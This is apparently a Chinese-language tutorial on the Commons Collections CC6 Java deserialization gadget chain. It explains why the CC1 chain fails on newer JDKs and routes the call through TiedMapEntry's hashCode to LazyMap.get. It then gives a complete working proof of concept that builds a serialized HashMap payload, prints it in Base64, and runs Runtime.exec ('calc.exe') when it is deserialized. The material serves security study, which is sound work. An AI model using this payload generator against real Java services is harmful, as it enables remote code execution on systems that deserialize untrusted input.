为什么cc1有jdk版本限制
JDK中的AnnotationInvocationHandler的readObject更新了,所以cc1用不了
但是前面的部分还是存在的,只要我们找到一个新的入口就还是能执行命令
这里回到LazyMap,LazyMap的get方法可以触发后续的rce
所以我们需要寻找新版本JDK中触发LazyMap中get方法的类
TideMapEntry
锵锵,上面说到的那个类就是TideMapEntry
TideMapEntry部分源码:
此时我们需要触发其hashcode方法
好熟悉啊,这不是DNSLog那条链吗?
从hash到hashcode()
但是HashMap的put方法会提前调用hash方法,导致提前走完流程
这里选择在新建LazyMap对象的时候,随便传入一个Transformer对象,等put完之后再通过反射修改回ChainedTransformer对象。
LazyMap的前提条件
这里我们先回到LazyMap的get方法,要containsKey(key)==false才会触发
在第一次随便传值(为了抵消hashmap触发的put)的时候就已经触发下面的put传值,反序列化时候就不会进入这个if判断了
所以我们需要执行lazymap.remove("2");把序列化时加入的值去掉
所以操作就是装入hashmap
去掉lazymap的key值,之后反射修改LazyMap中的payload
代码
package org.example;import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;public class Main {public static void main(String[] args) throws Exception {System.out.println("[+]构造Transformer数组的第一个参数ConstantTransformer\n 在transform时将会返回Runtime类A");ConstantTransformer a=new ConstantTransformer(Runtime.class);System.out.println("[+]构造Transformer数组的第二个参数InvokerTransformer\n 在transform时将会通过A.getMethod(\"getRuntime\")返回getRuntime方法类B");InvokerTransformer b=new InvokerTransformer("getMethod",new Class[]{String.class, Class[].class},new Object[] {"getRuntime", new Class[0]});System.out.println("[+]构造Transformer数组的第三个参数InvokerTransformer\n 在transform时将会通过B.invoke(C)执行getRuntime方法,返回runtime对象");InvokerTransformer c =new InvokerTransformer("invoke",new Class[]{Object.class, Object[].class},new Object[] {null, new Object[0]});System.out.println("[+]构造Transformer数组的第四个参数InvokerTransformer\n 在transform时将会通过D.exec(\"calc.exe\")执行命令");InvokerTransformer d=new InvokerTransformer("exec",new Class[]{String.class},new Object[] {"calc.exe"});Transformer[] transformers = new Transformer[]{a, b, c, d};System.out.println("[+]使用ChainedTransformer将该数组链接起来\n 执行ChainedTransformer.transform将会执行上述链条");Transformer transformerChain = new ChainedTransformer(transformers);// 创建Map并绑定transformerChainSystem.out.println("[+]创建LazyMap\n LazyMap的get方法会执行上述链条\n 随便传入一个Transformer对象,等put完之后再通过反射修改回ChainedTransformer对象");Map lazymap = LazyMap.decorate(new HashMap(), new ConstantTransformer("1"));System.out.println("[+]创建TideMapEntry装入HashMap\n 调用创建TideMapEntry的hashcode会执行上述链条\n hashcode()->getvalue()->LazyMap的get");TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, "2");HashMap<Object, Object> hashMap = new HashMap<>();hashMap.put(tiedMapEntry, "3");System.out.println("[+]调整lazymap");lazymap.remove("2");System.out.println("[+]put完成,通过反射修改回ChainedTransformer对象");Class<LazyMap> lazyMapClass = LazyMap.class;Field factoryField = lazyMapClass.getDeclaredField("factory");factoryField.setAccessible(true);factoryField.set(lazymap, transformerChain);System.out.println("\n[+]序列化");ByteArrayOutputStream serialize = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(serialize);oos.writeObject(hashMap);oos.close();System.out.println(" "+ Base64.getEncoder().encodeToString(serialize.toByteArray()));System.out.println("[+]反序列化触发");ObjectInputStream unserialize = new ObjectInputStream(new ByteArrayInputStream(serialize.toByteArray()));unserialize.readObject();}
}
运行结果
